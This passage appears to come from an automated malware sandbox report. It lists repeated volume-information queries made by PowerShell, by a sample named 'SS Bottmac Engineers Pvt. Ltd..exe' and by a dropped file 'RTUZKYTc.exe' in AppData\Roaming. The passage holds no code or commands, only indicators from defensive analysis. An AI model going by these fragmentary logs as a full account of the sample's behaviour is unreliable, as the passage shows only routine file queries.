Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Users\user\AppData\Roaming\RTUZKYTc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Users\user\AppData\Roaming\RTUZKYTc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
